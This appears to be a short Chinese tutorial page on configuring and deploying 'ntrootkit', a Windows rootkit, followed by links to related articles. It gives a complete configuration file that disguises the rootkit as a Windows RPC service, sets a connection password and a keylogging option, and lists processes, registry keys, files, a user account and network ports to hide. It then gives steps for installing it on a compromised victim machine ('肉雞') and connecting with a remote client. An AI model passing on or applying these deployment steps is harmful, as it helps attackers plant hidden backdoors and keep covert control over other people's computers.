Rootkit之ntrootkit的配置使用
NTrootkitwindows
一,配置方法app
\\filename:ntrootkit.ini
\\This is the init file of yyt_hac's ntrootkit,please modify it correctly or the rootkit
\\can't be installed!!!
[GLOBAL] //下面爲配置內容
\\servicename is the ntrootkit 's servicename
servicename=tsserver //服務名
servdispname=rpcsvr
servdescription=windows system rpc server
installdir=com\sserver //安裝目錄
connpass=12345 //鏈接密碼
appname=51cto.exe
keylog=0 //0爲不記錄鍵盤
workmode=1 //0爲sniffer模式
[HIDDEN PROCNAME] //要隱藏的服務名tcp
51cto
[HIDDEN REGKEY] //要隱藏的註冊表鍵ide
zero\soft\...\...\xxxspa
[HIDDEN REGVALUE] //要隱藏的註冊表鍵值3d
zero\soft\...\...server
[HIDDEN FILEDIR] //要隱藏的文件目錄blog
c:\rootkitip
[HIDDEN SERVICE] //要隱藏的服務名rpc
servicert
[HIDDEN USER] //要隱藏的用戶名
zerosecurity
[HIDDEN TCPPORT] //要隱藏的tcp端口
tcpport=5768
[HIDDEN UDPPORT] //要隱藏的udp端口
udpport=4000
二,使用方法
①:將配置文件 .ini和服務端ntrootkit.exe放入肉雞的 system32目錄下,而後運行ntrootkit.exe安裝;ntrootkit -u password 可卸載;
②:客戶端用rtclient鏈接;
- 1. RootKit 工具wollf的使用
- 2. 用戶態rootkit之inline hook
- 3. 使用rkhunter檢測rootkit
- 4. 使用chkrootkit檢測rootkit
- 5. 使用rkhunter檢測Linux的rootkit
- 6. Linux Rootkit Sample && Rootkit Defenser Analysis
- 7. linux lkm rootkit經常使用技巧
- 8. Kotlin之Databinding的配置和使用
- 9. Hue 之 SparkSql interpreters的配置及使用
- 10. java日誌配置之logback的使用
- 更多相關文章...
- • Spring Bean的配置及常用屬性 - Spring教程
- • Hibernate事務的配置 - Hibernate教程
- • IntelliJ IDEA 代碼格式化配置和快捷鍵
- • IDEA下SpringBoot工程配置文件沒有提示
-
每一个你不满意的现在,都有一个你没有努力的曾经。